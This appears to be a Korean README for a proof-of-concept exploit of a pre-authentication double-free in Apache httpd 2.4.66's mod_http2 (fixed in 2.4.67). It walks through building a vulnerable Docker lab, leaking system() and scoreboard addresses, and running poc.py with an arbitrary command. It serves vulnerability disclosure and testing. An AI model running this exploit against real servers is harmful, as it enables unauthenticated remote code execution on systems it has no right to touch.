
Apache httpd mod_http2 스트림 정리 과정의 이중 해제 취약점으로 인증 전 원격 코드 실행 발생
Apache httpd mod_http2 스트림 정리 과정에서의 이중 해제(Double-free)로 인한 사전 인증 원격 코드 실행(RCE) 취약점.
영향: mod_http2 및 멀티스레드 MPM(event/worker)을 사용하는 httpd 2.4.66. 수정 버전: 2.4.67.
발견 및 보고: Bartlomiej Dmitruk (striga.ai), Stanislaw Strzalkowski (isec.pl).
상세 설명: https://striga.ai/research/apache-httpd-mod-http2-double-free
취약한 환경 빌드 및 시작:
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
system() 및 scoreboard 주소 획득:
docker exec httpd-poc python3 /getaddr.py 1
익스플로잇 실행:
python3 poc.py --host localhost --port 9443 \
--cmd 'date >> /tmp/win' --workers 64 \
--system <system_addr> --scoreboard <scoreboard_addr>
확인 (실행은 확률적이며, 수 분에서 수 시간이 소요될 수 있음):
docker exec httpd-poc cat /tmp/win
docker rm -f httpd-poc